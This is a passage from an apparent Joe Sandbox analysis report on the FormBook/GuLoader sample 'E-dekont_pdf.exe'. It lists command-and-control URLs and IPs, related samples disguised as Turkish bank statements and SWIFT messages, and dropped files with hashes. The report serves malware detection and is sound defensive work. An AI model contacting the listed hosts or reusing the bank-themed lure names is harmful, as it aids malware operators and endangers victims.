                                                  http://www.sneakersuomo.com/mi94/?7n-Lh=6B2qrP5xTIPXUhljWLKFvclCy31c2DfKa32CVCvYSfVUhLKBGq8rlAeXXt8b11SpmRrr&7nrLOp=h2JXJDtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown

                                                  URLs from Memory and Binaries

                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdE-dekont_pdf.exe, 00000004.00000001.76878880686.00000000005F2000.00000020.00000001.01000000.00000006.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214E-dekont_pdf.exe, 00000004.00000001.76878880686.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.E-dekont_pdf.exe, 00000004.00000001.76878880686.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdE-dekont_pdf.exe, 00000004.00000001.76878880686.00000000005F2000.00000020.00000001.01000000.00000006.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://nsis.sf.net/NSIS_ErrorErrorE-dekont_pdf.exe, 00000001.00000000.76509619647.000000000040A000.00000008.00000001.01000000.00000003.sdmp, E-dekont_pdf.exe, 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmp, E-dekont_pdf.exe, 00000004.00000000.76878192409.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalse
                                                    		high
                                                    http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDE-dekont_pdf.exe, 00000004.00000001.76878880686.0000000000626000.00000020.00000001.01000000.00000006.sdmpfalse
                                                      		high
                                                      http://www.gopher.ftp://ftp.E-dekont_pdf.exe, 00000004.00000001.76878880686.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      185.53.179.90
                                                      		www.furniture-61686.comGermany
                                                      		61969TEAMINTERNET-ASDEtrue
                                                      185.53.179.91
                                                      		www.credit-cards-54889.comGermany
                                                      		61969TEAMINTERNET-ASDEtrue
                                                      34.117.26.57
                                                      		www.3ay82.xyzUnited States
                                                      		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGtrue
                                                      2.23.209.40
                                                      		unknownEuropean Union
                                                      		1273CWVodafoneGroupPLCEUfalse
                                                      15.197.142.173
                                                      		canadianbreederprogram.comUnited States
                                                      		7430TANDEMUStrue
                                                      23.227.38.74
                                                      		shops.myshopify.comCanada
                                                      		13335CLOUDFLARENETUStrue
                                                      66.29.154.110
                                                      		healthinsurancearena.comUnited States
                                                      		19538ADVANTAGECOMUStrue
                                                      34.117.168.233
                                                      		td-ccm-168-233.wixdns.netUnited States
                                                      		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGtrue
                                                      160.121.87.199
                                                      		www.anjin98.comSouth Africa
                                                      		137951CLAYERLIMITED-AS-APClayerLimitedHKtrue
                                                      81.171.22.5
                                                      		www.hotcoa.comNetherlands
                                                      		60781LEASEWEB-NL-AMS-01NetherlandsNLtrue
                                                      188.114.96.3
                                                      		www.sneakersuomo.comEuropean Union
                                                      		13335CLOUDFLARENETUStrue
                                                      34.102.136.180
                                                      		elatedfreedom.comUnited States
                                                      		15169GOOGLEUSfalse
                                                      198.54.117.211
                                                      		parkingpage.namecheap.comUnited States
                                                      		22612NAMECHEAP-NETUSfalse
                                                      205.178.189.129
                                                      		www.herhustlenation.comUnited States
                                                      		55002DEFENSE-NETUStrue
                                                      199.33.123.34
                                                      		www.hunterboots--canada.comUnited States
                                                      		26481REBEL-HOSTINGUStrue
                                                      34.138.169.8
                                                      		unknownUnited States
                                                      		2686ATGS-MMD-ASUStrue
                                                      164.155.209.181
                                                      		www.guesstheword.netSouth Africa
                                                      		26484IKGUL-26484UStrue
                                                      64.246.164.134
                                                      		lb-agent-dugout-pr.moxiworks.comUnited States
                                                      		6295GREENHOUSE-WAUSfalse

                                                      General Information

                                                      Joe Sandbox Version:37.0.0 Beryl
                                                      Analysis ID:847920
                                                      Start date and time:2023-04-17 08:55:00 +02:00
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 16m 40s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                      Number of analysed new started processes analysed:9
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:1
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample file name:E-dekont_pdf.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.evad.winEXE@8/10@20/18
                                                      EGA Information:
                                                      • Successful, ratio: 50%
                                                      HDC Information:
                                                      • Successful, ratio: 52.4% (good quality ratio 51.9%)
                                                      • Quality average: 87.9%
                                                      • Quality standard deviation: 20.6%
                                                      HCA Information:
                                                      • Successful, ratio: 87%
                                                      • Number of executed functions: 56
                                                      • Number of non-executed functions: 25
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe, svchost.exe
                                                      • Excluded IPs from analysis (whitelisted): 40.126.32.74, 40.126.32.133, 40.126.32.138, 40.126.32.136, 20.190.160.14, 40.126.32.68, 20.190.160.20, 40.126.32.134, 20.223.41.129
                                                      • Excluded domains from analysis (whitelisted): prdv6a.aadg.msidentity.com, wdcpalt.microsoft.com, client.wns.windows.com, login.live.com, www.tm.lg.prod.aadmsa.akadns.net, www.tm.v6.a.prd.aadg.akadns.net, wd-prod-cp-eu-north-4-fe.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, wdcp.microsoft.com, wd-prod-cp.trafficmanager.net, login.msa.msidentity.com
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Report size getting too big, too many NtSetInformationFile calls found.

                                                      Simulations

                                                      Behavior and APIs

                                                      No simulations

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      185.53.179.90ekstre_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • www.furniture-42269.com/mi94/?3fK0g=JxoL4&_N6l56=tM0cIu22lGNJS/LLx6gRwRxjNM5U60YmJux6FPvQAEnMOjJPh3bRcysDmxXQITeHVyGL
                                                      Ziraat_Bankasi_Swift_Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • www.hear-aid-92727.com/mi94/?Zb=o8vHo0k&JDHDX0E0=/g6iPkZMT+AzSmj4EvOYZViGf2+l/NC2EVsOgk6j6s7G3J7D5NbiJXA89lK55coRI4US
                                                      Ziraat_Bankasi_Swift_Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • www.furniture-42269.com/mi94/?DPeDz=d0GxcXi04fyHIhwp&4hIdoj=tM0cIu22lGNJS/LLx6gRwRxjNM5U60YmJux6FPvQAEnMOjJPh3bRcysDmxXQITeHVyGL
                                                      rE-dekont_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • www.furniture-42269.com/mi94/?q84XRrY=tM0cIu22lGNJS/LLx6gRwRxjNM5U60YmJux6FPvQAEnMOjJPh3bRcysDmxXQITeHVyGL&Tlw=EZKh7LeX
                                                      E-dekont.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • www.furniture-42269.com/mi94/?f0G4=zFNL5R_XT&yBZXKPZh=tM0cIu22lGNJS/LLx6gRwRxjNM5U60YmJux6FPvQAEnMOjJPh3bRcysDmxXQITeHVyGL
                                                      Ziraat_Bankasi_Swift_Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • www.furniture-61686.com/mi94/?t6jP=c9XLkKzZuO0py6g1xPdswXMX5NoX1FOKmat/CxXpy/HRSPu3IeXDT300PcCDZZ6h5UkV&4hiPj=lPrX
                                                      Ziraat_Bankasi_Swift_Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • www.furniture-42269.com/mi94/?gDHH0Ncx=tM0cIu22lGNJS/LLx6gRwRxjNM5U60YmJux6FPvQAEnMOjJPh3bRcysDmxXQITeHVyGL&dL0pM=7n30vhSPavQpOJ
                                                      ekstre.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • www.furniture-61686.com/mi94/?-Z=6lfDx&5jbDpbb=c9XLkKzZuO0py6g1xPdswXMX5NoX1FOKmat/CxXpy/HRSPu3IeXDT300PcCDZZ6h5UkV
                                                      popis_proizvoda_pdf.exeGet hashmaliciousFormBook, DBatLoader, PlayBrowse
                                                      • www.mid-size-suv-87652.com/kmge/
                                                      Ziraat_Bankasi_Swift_Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • www.furniture-61686.com/mi94/?w88pk=c9XLkKzZuO0py6g1xPdswXMX5NoX1FOKmat/CxXpy/HRSPu3IeXDT300PcCDZZ6h5UkV&d2Jtc=7nP4ovT8HZ38
                                                      Ziraat_Bankasi_Swift_Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • www.furniture-42269.com/mi94/?b48LI=EhOhAfF&Lj8DtN=tM0cIu22lGNJS/LLx6gRwRxjNM5U60YmJux6FPvQAEnMOjJPh3bRcysDmxXQITeHVyGL
                                                      dekont.exeGet hashmaliciousFormBookBrowse
                                                      • www.car-deals-92924.com/vy03/?j4aXp=9ZyYkocr0rsbsEFn1Hi6t7U9b0MF6qCTAShnN0GUobwOp1gVFaqCm26aA4E3J+5DPP56&fZCH=3filrXc8FLxl
                                                      e-dekont.exeGet hashmaliciousFormBookBrowse
                                                      • www.car-deals-92924.com/vy03/?v6AX-=9ZyYkocr0rsbsEFn1Hi6t7U9b0MF6qCTAShnN0GUobwOp1gVFaqCm26aA7knGfp7RqQ9&z8Jt7b=7n6P220Py
                                                      E-Dekont.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • www.cleaning-services-82507.com/ls20/?i67H=+owhMk/YucilJ2bW37X96/0il6r4b5OhumYTgHz/g/DglzXrOFHbmRKxut2lTfZ7Q+jv&2dnpMv=EPsTJ2
                                                      E-dekont.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • www.boats-for-sale-33038.com/my24/?1but_F=2dcPt2bHAxG4&1bBl=LE+Bk/1AXsK+2UXPX59CHMY/cAS89YjMEg0D+fQFWnJkbE6AigVDzSJoejMJ8EuJGVTw
                                                      Posta siparisi hk.exeGet hashmaliciousFormBookBrowse
                                                      • www.data-science-13819.com/tc10/?v6aTA=LcDUU4duXH7qSXYjQsXn8Nc6wn9aO97uBJdklVUR+aXjXdGdKr0FwWTBkYOddJSPCryk&p2J=eJEpMnL8ttItqVgP
                                                      Sorgulama 22604476, pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • www.couches-sofas-89554.com/gg5z/?R6FP=tbTnA/XpUA9jvBwE35Dt3FmoWFjNuVgul2YLDA7U/NJ76qzSaPKqnY9+tpKxdmQFAH+RlvnAQ7yw2irmLtIkuUm4iqS+kxbZ6g==&G48tq=HPFH
                                                      Sat#U0131n Alma Emri Metak_JJO-003, PDF.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • www.couches-sofas-89554.com/gg5z/?0BZH=tbTnA/XpUA9jvBwE35Dt3FmoWFjNuVgul2YLDA7U/NJ76qzSaPKqnY9+tpKxdmQFAH+RlvnAQ7yw2irmLtIkuUm4iqS+kxbZ6g==&6lu4=mZxdA4fHUV
                                                      SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.30690.rtfGet hashmaliciousFormBookBrowse
                                                      • www.rv-camper-motorhomes-60954.com/g31s/?l2MD=NMHrzlnjkw+ZGR96elbBPIr6pzBr0K/oylUer7nLtPvi9NvjdnVugpjxkndVyCwmvrpdxw==&8poX1Z=4hFtttAHB
                                                      Formcomp profile survey sheet.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • www.drainpipecleanerin.com/h4ed/?h48pcz=CTtPJFB&GVp=Vl0fkZnLG42mAxOEpd9tiRw0ellV+YEM1mlAYEZcrshq2bDT62/kq1O+gQ5Q3/Ap4USm

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      td-ccm-168-233.wixdns.netnew_order_no_3we3.com.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                      • 34.117.168.233
                                                      Yeni_siparis_eklendi.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                      • 34.117.168.233
                                                      Spildtids.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 34.117.168.233
                                                      rCloggiest.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 34.117.168.233
                                                      Ziraat_Bankasi_Swift_Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 34.117.168.233
                                                      Sipari#U015f_-_30835.exeGet hashmaliciousFormBookBrowse
                                                      • 34.117.168.233
                                                      yFdkHs79l2.exeGet hashmaliciousFormBookBrowse
                                                      • 34.117.168.233
                                                      Poniarding.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 34.117.168.233
                                                      cQBeoB1TOe.exeGet hashmaliciousFormBookBrowse
                                                      • 34.117.168.233
                                                      DLnIpvsj6q.exeGet hashmaliciousFormBookBrowse
                                                      • 34.117.168.233
                                                      J2wqtV6Si7.exeGet hashmaliciousFormBookBrowse
                                                      • 34.117.168.233
                                                      Cease_and_Desist.exeGet hashmaliciousFormBookBrowse
                                                      • 34.117.168.233
                                                      SecuriteInfo.com.Variant.Babar.161191.3845.26747.exeGet hashmaliciousFormBookBrowse
                                                      • 34.117.168.233
                                                      CustomsXIDXXXPhotos.xlsxGet hashmaliciousFormBookBrowse
                                                      • 34.117.168.233
                                                      RcOi9DyfRC.exeGet hashmaliciousFormBookBrowse
                                                      • 34.117.168.233
                                                      GjcrBb23de.exeGet hashmaliciousFormBookBrowse
                                                      • 34.117.168.233
                                                      5honHJ9Pur.exeGet hashmaliciousFormBookBrowse
                                                      • 34.117.168.233
                                                      rHovednringsvejene.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 34.117.168.233
                                                      Nova_lista_narudzbi.exeGet hashmaliciousFormBook, DBatLoaderBrowse
                                                      • 34.117.168.233
                                                      E-dekont.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 34.117.168.233

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      TEAMINTERNET-ASDEekstre_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 185.53.179.91
                                                      Ziraat_Bankasi_Swift_Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 185.53.179.174
                                                      Ziraat_Bankasi_Swift_Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 185.53.179.90
                                                      rE-dekont_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 185.53.179.90
                                                      CocpoiGR8a.exeGet hashmaliciousFormBookBrowse
                                                      • 185.53.179.94
                                                      J2wqtV6Si7.exeGet hashmaliciousFormBookBrowse
                                                      • 185.53.179.171
                                                      iuX06DLYP2.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 185.53.179.94
                                                      E-dekont.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 185.53.179.90
                                                      ORDEN_DE_COMPRA_6547#.exeGet hashmaliciousFormBookBrowse
                                                      • 185.53.179.93
                                                      770530986300323.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 185.53.179.171
                                                      Ziraat_Bankasi_Swift_Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 185.53.179.173
                                                      DETALLES_DEL_PAGO.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 185.53.179.171
                                                      Ziraat_Bankasi_Swift_Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 185.53.179.173
                                                      ekstre.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 185.53.179.91
                                                      ekstre.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 185.53.179.91
                                                      popis_proizvoda_pdf.exeGet hashmaliciousFormBook, DBatLoader, PlayBrowse
                                                      • 185.53.179.90
                                                      E-DEKONT_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 185.53.179.91
                                                      Ziraat_Bankasi_Swift_Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 185.53.179.173
                                                      Ziraat_Bankasi_Swift_Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 185.53.179.91
                                                      Kf5gI5Ttry.exeGet hashmaliciousFormBookBrowse
                                                      • 185.53.179.171
                                                      TEAMINTERNET-ASDEekstre_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 185.53.179.91
                                                      Ziraat_Bankasi_Swift_Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 185.53.179.174
                                                      Ziraat_Bankasi_Swift_Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 185.53.179.90
                                                      rE-dekont_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 185.53.179.90
                                                      CocpoiGR8a.exeGet hashmaliciousFormBookBrowse
                                                      • 185.53.179.94
                                                      J2wqtV6Si7.exeGet hashmaliciousFormBookBrowse
                                                      • 185.53.179.171
                                                      iuX06DLYP2.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 185.53.179.94
                                                      E-dekont.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 185.53.179.90
                                                      ORDEN_DE_COMPRA_6547#.exeGet hashmaliciousFormBookBrowse
                                                      • 185.53.179.93
                                                      770530986300323.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 185.53.179.171
                                                      Ziraat_Bankasi_Swift_Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 185.53.179.173
                                                      DETALLES_DEL_PAGO.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 185.53.179.171
                                                      Ziraat_Bankasi_Swift_Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 185.53.179.173
                                                      ekstre.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 185.53.179.91
                                                      ekstre.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 185.53.179.91
                                                      popis_proizvoda_pdf.exeGet hashmaliciousFormBook, DBatLoader, PlayBrowse
                                                      • 185.53.179.90
                                                      E-DEKONT_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 185.53.179.91
                                                      Ziraat_Bankasi_Swift_Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 185.53.179.173
                                                      Ziraat_Bankasi_Swift_Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 185.53.179.91
                                                      Kf5gI5Ttry.exeGet hashmaliciousFormBookBrowse
                                                      • 185.53.179.171

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      C:\Users\user\AppData\Local\Temp\nsdECC9.tmp\System.dllSamples.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        Samples.exeGet hashmaliciousGuLoaderBrowse
                                                          E-dekont_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            ekstre_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                              Ziraat_Bankasi_Swift_Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                Ziraat_Bankasi_Swift_Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  E-dekont_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                    ekstre_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                      Ziraat_Bankasi_Swift_Mesaji.exeGet hashmaliciousGuLoaderBrowse
                                                                        Ziraat_Bankasi_Swift_Mesaji.exeGet hashmaliciousGuLoaderBrowse
                                                                          rE-dekont_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                            rE-dekont_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                              AWB_Invoice.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                AWB_Invoice.exeGet hashmaliciousGuLoaderBrowse
                                                                                  Swift_mesaj.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                    Swift_mesaj.exeGet hashmaliciousGuLoaderBrowse
                                                                                      Halkbank_Ekstre_20191415_081738_949589.pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                        Halkbank_Ekstre_20191415_081738_949589.pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                          Halkbank_Ekstre_20191415_081738_949589.pdf.exeGet hashmaliciousGuLoaderBrowse

                                                                                            Created / dropped Files

                                                                                            C:\Users\user\AppData\Local\Temp\nsdECC9.tmp\System.dll

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\E-dekont_pdf.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):12288
                                                                                            Entropy (8bit):5.9764977667479
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:CVA1YOTDExj7EFrYCT4E8y3hoSdtTgwF43E7QbGPXI9uIc6w79Mw:CrR7SrtTv53tdtTgwF4SQbGPX36wJMw
                                                                                            MD5:D968CB2B98B83C03A9F02DD9B8DF97DC
                                                                                            SHA1:D784C9B7A92DCE58A5038BEB62A48FF509E166A0
                                                                                            SHA-256:A4EC98011EF99E595912718C1A1BF1AA67BFC2192575729D42F559D01F67B95C
                                                                                            SHA-512:2EE41DC68F329A1519A8073ECE7D746C9F3BF45D8EF3B915DEB376AF37E26074134AF5F83C8AF0FE0AB227F0D1ACCA9F37E5CA7AE37C46C3BCC0331FE5E2B97E
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Joe Sandbox View:
                                                                                            • Filename: Samples.exe, Detection: malicious, Browse
                                                                                            • Filename: Samples.exe, Detection: malicious, Browse
                                                                                            • Filename: E-dekont_pdf.exe, Detection: malicious, Browse
                                                                                            • Filename: ekstre_pdf.exe, Detection: malicious, Browse
                                                                                            • Filename: Ziraat_Bankasi_Swift_Mesaji.exe, Detection: malicious, Browse
                                                                                            • Filename: Ziraat_Bankasi_Swift_Mesaji.exe, Detection: malicious, Browse
                                                                                            • Filename: E-dekont_pdf.exe, Detection: malicious, Browse
                                                                                            • Filename: ekstre_pdf.exe, Detection: malicious, Browse
                                                                                            • Filename: Ziraat_Bankasi_Swift_Mesaji.exe, Detection: malicious, Browse
                                                                                            • Filename: Ziraat_Bankasi_Swift_Mesaji.exe, Detection: malicious, Browse
                                                                                            • Filename: rE-dekont_pdf.exe, Detection: malicious, Browse
                                                                                            • Filename: rE-dekont_pdf.exe, Detection: malicious, Browse
                                                                                            • Filename: AWB_Invoice.exe, Detection: malicious, Browse
                                                                                            • Filename: AWB_Invoice.exe, Detection: malicious, Browse
                                                                                            • Filename: Swift_mesaj.exe, Detection: malicious, Browse
                                                                                            • Filename: Swift_mesaj.exe, Detection: malicious, Browse
                                                                                            • Filename: Halkbank_Ekstre_20191415_081738_949589.pdf.exe, Detection: malicious, Browse
                                                                                            • Filename: Halkbank_Ekstre_20191415_081738_949589.pdf.exe, Detection: malicious, Browse
                                                                                            • Filename: Halkbank_Ekstre_20191415_081738_949589.pdf.exe, Detection: malicious, Browse
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7@t.s!..s!..s!..!T..t!..8Y..t!..s!..g!...T..w!...T..r!...T..r!...T..r!..Richs!..........................PE..L....c.........."!.....$..........J........@...............................p............@..........................@.......A..P............................`.......................................................@..X............................text...{".......$.................. ..`.rdata.......@.......(..............@..@.data...D....P.......,..............@....reloc.......`......................@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Temp\nssEC3B.tmp

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\E-dekont_pdf.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):675902
                                                                                            Entropy (8bit):6.3840621929307035
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:E0aCFeyloQ3K1rPqZQljs0v64SLzIAv90Y:mCla1rPqZQllvkzIAv5
                                                                                            MD5:9EE69CC8220297EDBA15255BF0414827
                                                                                            SHA1:58AA27569749338EFC0CDE473A357C71F47697F1
                                                                                            SHA-256:106D0F71DFDE677B346D5432D885E381620D88F75C39E848924A218188BD19F2
                                                                                            SHA-512:B2D570386FA072CC590E67F8329AB1F1B57A51D252D9EA8C59B6247E1FAA6DCBD6EA607665937790BAFD3AAB0ADCCD41A14CCD4EE3822D6C400DC8CCA08B0929
                                                                                            Malicious:false
                                                                                            Preview:0^......,................A..r...<N......j]......0^..........................................................................................................................................................................................................................................G...Y...............j...............................................................................................................................a...........?...$...t...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Roaming\DORME.ini

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\E-dekont_pdf.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):31
                                                                                            Entropy (8bit):4.244518891032036
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:UkE74OvrMXMAzovn:izMxEvn
                                                                                            MD5:3000F7F0F12B7139EA28160C52098E25
                                                                                            SHA1:9D032395F38D341881019B996E591160D542054B
                                                                                            SHA-256:467B09FF26622746D205628AE325EC9838461BC5FE741B3757BB39DDEC87ECB1
                                                                                            SHA-512:A76A2F1E3686E2FFD03388EC7DBCD4AFA6AE53CCD3AA40C6FBBF0C994EEE5E2685D0C412F15EC4506C1175F5A84712E1A8B7AE32E6A0327E1BA47321A59E0EE2
                                                                                            Malicious:false
                                                                                            Preview:[ManualPaths]..NumEntries=Hai..

                                                                                            C:\Users\user\AppData\Roaming\Uundvrligheden\Rendejerns\Akkompagnatr\Bluetooth Suite help_PORE.chm

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\E-dekont_pdf.exe
                                                                                            File Type:MS Windows HtmlHelp Data
                                                                                            Category:dropped
                                                                                            Size (bytes):46645
                                                                                            Entropy (8bit):7.456047718298778
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:EVsyha/iORJz67W7rPu/kCaPk6pPNam96ZLj8vZww8jtZ1RXaQhjr8FwKVf1B:EeyharJ+7W7rmvarh/Zww8xZbXba1fz
                                                                                            MD5:E59D1EDF1BD19ABC1ECEA7E194ACE1D2
                                                                                            SHA1:D232845105AC63EAEB599C11252F406BF331E204
                                                                                            SHA-256:35E84A54D342EE093627F937F0E27CB4EBB6DEAE7CDA76592F7F8900DE8B357C
                                                                                            SHA-512:7CA634D842AF8F006D72450758DBCE00D6576FA3BFBB936E6C2F60E644BDDFA2099308408919F752FD103C40FFC94577771F6DD088272E6217A77B6C176CEF96
                                                                                            Malicious:false
                                                                                            Preview:ITSF....`.........4........|.{.......".....|.{......."..`...............x.......T.......................5...............ITSP....T...........................................j..].!......."..T...............PMGL0................/..../#IDXHDR...v.../#ITBITS..../#STRINGS...[.[./#SYSTEM..n.U./#TOPICS...v.@./#URLSTR...&.5./#URLTBL...6.p./#WINDOWS...,.L./$FIftiMain...e..../$OBJINST...&.?./$WWAssociativeLinks/..../$WWAssociativeLinks/Property..."../$WWKeywordLinks/..../$WWKeywordLinks/BTree...x.L./$WWKeywordLinks/Data...D4./$WWKeywordLinks/Map...x../$WWKeywordLinks/Property.... ./Advanced_Phone_Operations.htm....{./Audio_Services.htm....o./Authorization_Options.htm..u.]$/Bluetooth Win7 Vista Suite help.hhc.....i$/Bluetooth Win7 Vista Suite help.hhk...k."./Bluetooth_Devices.htm..R..s./Bluetooth_Devices_files/...//Bluetooth_Devices_files/colorschememapping.xml.....:%/Bluetooth_Devices_files/filelist.xml.....['/Bluetooth_Devices_files/themedata.thmx...h. ./Bluetooth_Settings.htm...E..s./Bluetooth_

                                                                                            C:\Users\user\AppData\Roaming\Uundvrligheden\Rendejerns\Akkompagnatr\Tryneren.Elu

                                                                                            Download File
